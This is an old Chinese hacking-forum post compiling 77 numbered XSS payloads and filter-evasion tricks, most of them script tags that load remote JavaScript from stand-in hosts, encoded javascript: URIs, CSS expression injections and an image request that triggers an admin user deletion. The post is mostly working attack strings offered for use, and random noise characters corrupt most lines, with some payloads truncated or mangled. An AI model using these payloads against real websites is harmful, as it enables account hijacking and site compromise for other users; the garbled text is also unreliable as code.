找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2931|回复: 0
打印 上一主题 下一主题

XSS攻击汇总

[复制链接]
跳转到指定楼层
楼主
发表于 2013-4-19 19:22:37 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。7 \6 D/ F% F- E" x# v2 `
(1)普通的XSS JavaScript注入
2 @) B2 F2 p4 ?' b& z& n<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>7 g; I" d  d/ W+ C# ?
(2)IMG标签XSS使用JavaScript命令6 |7 A/ Z- ^# A; m  E* N
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>+ M7 n7 ^! E* `, L4 F$ V
(3)IMG标签无分号无引号
6 \, A' K: U  a; R<IMG SRC=javascript:alert(‘XSS’)>4 l' s$ F: g: X( e
(4)IMG标签大小写不敏感
) |9 j, Q) i: `% I$ M& Y<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
- _5 e, J! d0 D% \(5)HTML编码(必须有分号)
: l0 R* p- I; E0 a- ^<IMG SRC=javascript:alert(“XSS”)>
/ f( b& Z& z; x7 c" y+ _1 w( G4 ]" c(6)修正缺陷IMG标签
$ t( O, D/ t- y/ Q$ h  \* U( l<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>; j3 H  k1 i$ F# x! G6 Y6 ?" H
, r, t! |0 |6 h0 o. n

; v1 B$ `  ?% |' g- q, o9 c! n(7)formCharCode标签(计算器)
6 C* D4 T& h% s<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 V' }! f: [$ p(8)UTF-8的Unicode编码(计算器)
$ r3 {" q! |* v<IMG SRC=jav..省略..S')>: H' @' L7 Z0 Q6 n6 D5 A! S
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
$ V7 ^; ^. J" r+ Q0 _5 Y/ {( h<IMG SRC=jav..省略..S')>
4 q% C* _! }4 b/ l4 q* H(10)十六进制编码也是没有分号(计算器)
2 _( ]; n) e: M2 W& `- E5 j  `* J<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
2 z: v+ S" E. C. Q. i(11)嵌入式标签,将Javascript分开
+ P5 j7 l, P4 w<IMG SRC=”jav ascript:alert(‘XSS’);”>
: _) D4 c# u7 s* o! G; U& i1 X(12)嵌入式编码标签,将Javascript分开0 I% [8 \' J  F+ o* j0 S
<IMG SRC=”jav ascript:alert(‘XSS’);”>
5 i7 X* I+ d: d- O" H2 g(13)嵌入式换行符
8 `. q2 K3 A% y* ?8 O  p% f<IMG SRC=”jav ascript:alert(‘XSS’);”>+ L% X6 Y' \9 s1 _/ x
(14)嵌入式回车
, ?, G, C: z6 d0 {% [5 `+ l( V<IMG SRC=”jav ascript:alert(‘XSS’);”>1 L! g5 e, W1 D
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
7 c9 q- V4 o# Q& O/ \. d+ C<IMG SRC=”javascript:alert(‘XSS‘)”>  p5 F/ k' h% j4 M8 o4 M
(16)解决限制字符(要求同页面)( W# G1 c5 u  B$ {; [; d) B' B$ P. ]! V
<script>z=’document.’</script>/ |1 y9 t& l. I5 G/ W$ W
<script>z=z+’write(“‘</script>2 z5 E. Y2 `# h/ f5 f* x3 n2 Z
<script>z=z+’<script’</script>( o5 M) I" U6 u5 ^' w
<script>z=z+’ src=ht’</script>
' A  g1 n/ q$ V. R: N<script>z=z+’tp://ww’</script>0 S* n  d3 {1 ?7 L
<script>z=z+’w.shell’</script>, l, K9 n& q; Z' `* l
<script>z=z+’.net/1.’</script>- C9 u" n2 R' U* y3 Z1 E
<script>z=z+’js></sc’</script># e8 V# s  J& x: M% |* f3 v
<script>z=z+’ript>”)’</script>4 k, U( e( ^. ~" c  a9 d
<script>eval_r(z)</script>
1 l2 j& h! E) v) J8 h(17)空字符12-7-1 T00LS - Powered by Discuz! Board# A: `: U; w: J
https://www.t00ls.net/viewthread ... table&tid=15267 2/6% k# ], t  i  S  P4 m. T8 n
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out
8 J. a* a! |4 {3 e; e7 H1 l0 g(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用
' ]" O, o/ `. Y4 ?( uperl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out* F& n0 S. W. ~  e( e* F
(19)Spaces和meta前的IMG标签4 ?% ~6 @5 D& u% j3 {3 D1 c
<IMG SRC=” javascript:alert(‘XSS’);”>
+ x9 v$ ^* \. k2 l2 n- [) u(20)Non-alpha-non-digit XSS
# x+ Y: ^6 d: |& \( x9 O+ C$ a<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>+ T( W( T2 B& Z+ z( s
(21)Non-alpha-non-digit XSS to 2* w8 k6 s0 v! J3 L9 k% `
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>" {; A7 D% d7 S6 j1 d
(22)Non-alpha-non-digit XSS to 3: r" Z2 d# Z8 Q
<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>
2 U, V, Q" O2 m1 A9 o(23)双开括号' w# ~# B8 Y2 O1 E
<<SCRIPT>alert(“XSS”);//<</SCRIPT>
- a  E* w+ o9 a8 F& C- r! v6 k(24)无结束脚本标记(仅火狐等浏览器)4 u$ Y  U4 w& d* g) W( \
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
8 e8 D1 L9 b# c" e(25)无结束脚本标记2
) i' }( ~6 U5 `" N, j<SCRIPT SRC=//3w.org/XSS/xss.js>
6 C( i* y, U! B(26)半开的HTML/JavaScript XSS, D/ b1 e1 l- T3 X. W4 O
<IMG SRC=”javascript:alert(‘XSS’)”! b- L. y8 z0 S
(27)双开角括号; Z' B9 V# \4 W9 _- P8 b
<iframe src=http://3w.org/XSS.html <
* G- b( z+ t( R4 y8 G3 r(28)无单引号 双引号 分号
! x5 O0 G& h; g% X8 t$ o<SCRIPT>a=/XSS/
+ V# `" m* j5 I! c; t& _/ A4 Zalert(a.source)</SCRIPT># v0 p4 w' C3 y+ e
(29)换码过滤的JavaScript: o* {# D9 C* i$ V5 g- k* E6 L6 b
\”;alert(‘XSS’);//" r4 {* j& {. b( j( T) O* i0 D% s+ G
(30)结束Title标签( A- G( Z. _- ?( w
</TITLE><SCRIPT>alert(“XSS”);</SCRIPT>& v) p6 m  _# H9 _8 u. o9 C& A
(31)Input Image3 o# S- h' t' @* R5 W: y
<INPUT SRC=”javascript:alert(‘XSS’);”>/ W4 T6 f3 B( C$ c6 X- K. [
(32)BODY Image5 C- i! }2 L( s+ n3 [
<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
* p1 b( _7 J5 i' b(33)BODY标签
) \% L% n; m% Z# x# ]& c( n; g8 T<BODY(‘XSS’)>
  T3 g+ t4 X) Q1 c9 A4 t(34)IMG Dynsrc& r" F0 L- ?) l$ F, h. g! U" d
<IMG DYNSRC=”javascript:alert(‘XSS’)”>: w3 }$ n: `! H( C" c
(35)IMG Lowsrc9 V7 B5 k: v8 D5 R1 }
<IMG LOWSRC=”javascript:alert(‘XSS’)”>- |5 p2 c1 p4 [3 e% ?+ I2 Z1 \
(36)BGSOUND
% b- C1 o3 Z. O' [! \<BGSOUND SRC=”javascript:alert(‘XSS’);”>! V4 O! q* V$ z1 |* P. O
(37)STYLE sheet" q! `2 n. n) r9 Q1 l: c! S
<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>0 Q3 Q7 b! _' F- O7 a* Y4 c8 N
(38)远程样式表
2 w- ~$ l* M# ]. E5 `. `9 L. ?+ n<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
( t# X/ N7 Y1 z& G# e. P(39)List-style-image(列表式)
3 X6 R5 y  G( P' U: M! T<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS
2 q$ i* y& l3 {$ l(40)IMG VBscript
4 M( h. y) X5 S' v0 K7 p$ R<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS) p8 S( d$ l2 s# O
(41)META链接url2 |* B  o' P0 y2 @
5 A" h, Q& \5 W! O- F4 Q
( q1 z4 r- ~$ a) f
<META HTTP-EQUIV=”refresh” CONTENT=”0;3 K& x& ~. L  R1 O) Y+ z
URL=http://;URL=javascript:alert(‘XSS’);”>1 Y1 T* J3 d& H0 H4 n- ?
(42)Iframe7 z0 e8 a) H' r- R& @, V
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>2 g8 s( o) E6 S2 X9 v/ A3 L2 f
(43)Frame: E4 o6 R  ]- ]. ?
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
7 @$ T6 T& l5 H/ m! w# ^https://www.t00ls.net/viewthread ... table&tid=15267 3/6
, {. y5 G5 G$ x3 H4 V" n$ n(44)Table
) K. m' x" K/ V0 ^' a% \, l0 t<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>
) r* M! Z+ T  a% E8 }9 F! ?(45)TD
4 I5 z- ^' `. c9 S/ F& j( O: F6 p<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>3 ~3 s# B! I$ G3 n2 Q$ f
(46)DIV background-image! h4 ]" m0 E. B1 }$ ^
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>( ^3 {& w( q# X4 u! u
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-
9 }2 F/ V1 n7 X1 a% k  i8&13&12288&65279)& D1 }) M# N! u1 J6 ]
<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>! [0 y$ r" B) Q4 z
(48)DIV expression; {' {1 L' ^1 _1 \8 G: w
<DIV STYLE=”width: expression_r(alert(‘XSS’));”>
  ]6 s7 q. v  B; x$ f(49)STYLE属性分拆表达
2 O5 a; w6 y0 S<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
! i" r3 V7 `8 v  s(50)匿名STYLE(组成:开角号和一个字母开头)2 Q/ p% k, Y% N6 n
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>6 h! r; ^6 N' @" u
(51)STYLE background-image$ |' r% K; ?. `+ h' \% M" Y2 C7 d# A
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A
( t3 D) b/ x$ {" c, PCLASS=XSS></A>
5 p4 T- w0 y) L  t4 y(52)IMG STYLE方式2 c6 r. W0 `' m7 e* @
exppression(alert(“XSS”))’>
7 [+ ]+ ]9 {8 B, l( D0 f6 \% h# `(53)STYLE background5 ]/ o6 _' g+ w" b0 N0 r; y( H7 J/ [
<STYLE><STYLE
. E# H. J& f' }type=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>
% ]4 q& T1 F1 h: e0 t8 P(54)BASE. a3 e: u" q8 P/ s! L" C
<BASE HREF=”javascript:alert(‘XSS’);//”>. f, Z+ X/ e! f- w
(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
  J% ]. j: t3 H+ L. d: y/ G, Y<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>
( w  C; j' F8 Q; K9 ?(56)在flash中使用ActionScrpt可以混进你XSS的代码8 l* c4 I; T9 u9 b/ F! [
a=”get”;
' W9 j& J8 E: p) K; f( H0 Eb=”URL(\”";* I% l3 H* ~! y. a
c=”javascript:”;; F! I% F+ z! ]# n# r
d=”alert(‘XSS’);\”)”;
8 b8 @; Z) u/ a3 J/ Veval_r(a+b+c+d);
1 i) q: Z3 B0 r+ O) j# S( R(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
) _  l( O" }. Y! f& ^<HTML xmlns:xss>* m) J' D8 v: f. }
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>
4 v- {+ @1 f. H<xss:xss>XSS</xss:xss>
; E7 F' [6 H( D$ s: J, m</HTML>
8 {5 v4 Z7 D- Q* ~(58)如果过滤了你的JS你可以在图片里添加JS代码来利用5 }5 I9 Q9 s: K; j# k( `
<SCRIPT SRC=””></SCRIPT>( C3 J0 M. L" q- ]$ k+ c! R1 N
(59)IMG嵌入式命令,可执行任意命令. P6 {8 H( ^( N, B% K4 ^* W
<IMG SRC=”http://www.XXX.com/a.php?a=b”>
3 a7 g6 ]/ {9 {$ Q  o- T  S! V(60)IMG嵌入式命令(a.jpg在同服务器)) ], \9 T+ G+ G- ?( l  ]
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser( q* n# B0 x; |) e$ w" g3 K5 i
(61)绕符号过滤- M! Q# t" Q! \7 n; v! G# w
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>
& B" F) O4 R# s2 }( j2 {2 K) k(62)
. f( t. E8 B# ^<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>; i3 Q5 J* n/ P
(63)- X% E2 r- U9 w8 E
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>
9 c; [( a3 C" N  E6 c1 A/ y) s( A; X2 B(64)
- j: ~, y" R. v9 \) C2 @<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>
5 M5 r0 Z! {" Q8 |(65)
/ }% `4 R+ J+ f' N9 c5 o<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>( j, U; J& ^+ P/ Z
(66)12-7-1 T00LS - Powered by Discuz! Board
% _" }1 f3 w1 n* H# c7 A+ w! Phttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
$ c/ u5 N) x+ u* {<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
8 A5 x. N+ @/ Z( I(67)( u% n% T+ ~9 O  F! ^& T
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>4 {7 m! P' w  B) R/ q
</SCRIPT>+ u- E  T  o2 K* k( @3 X
(68)URL绕行* M; U" o% g4 i
<A HREF=”http://127.0.0.1/”>XSS</A>
' @4 l; @8 i6 o- |(69)URL编码( D4 m" M) N  x- b' R
<A HREF=”http://3w.org”>XSS</A>
" H( H* y2 E3 ?( u(70)IP十进制- ^' f3 Q5 J9 z  X+ F. g
<A HREF=”http://3232235521″>XSS</A>
. ]' Y. c; I8 p% N) M(71)IP十六进制
6 g; z$ |: v+ ]; r$ q9 I<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>- @/ l8 g* C; R0 n4 ~4 n' O, I$ [
(72)IP八进制, x. e6 K9 \; ]; X: m4 y# l0 g3 l+ ^
<A HREF=”http://0300.0250.0000.0001″>XSS</A>2 W' q" D- ~2 r' a+ d* m
(73)混合编码5 K# |7 R9 k/ F
<A HREF=”h7 U/ O; K' N/ u! D- J$ ~, u
tt p://6 6.000146.0×7.147/”">XSS</A>: w2 Q" s, c! c0 t, h- u- l' C
(74)节省[http:]
% c1 X; [4 s9 F# F( j<A HREF=”//www.google.com/”>XSS</A>; F' j; r1 V& o6 r. G6 L5 R+ u" c
(75)节省[www]: y! X& f3 r+ w8 a- ?, F* D+ |+ q' Q
<A HREF=”http://google.com/”>XSS</A>* K( N# V; m2 ^  v) g5 f
(76)绝对点绝对DNS8 m) [! I# Z( Y. M) y+ V
<A HREF=”http://www.google.com./”>XSS</A>7 n+ U) X3 F- r1 w& P1 _/ G
(77)javascript链接. F, J- V# _1 \1 W' A
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>
' q# G$ q' v# K; U; Q% s3 m2 D- M/ P) |! u* c
原文地址:http://fuzzexp.org/u/0day/?p=14: j' f1 `3 X% S5 [. b

% t2 ~" J! a/ ]2 o, P
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表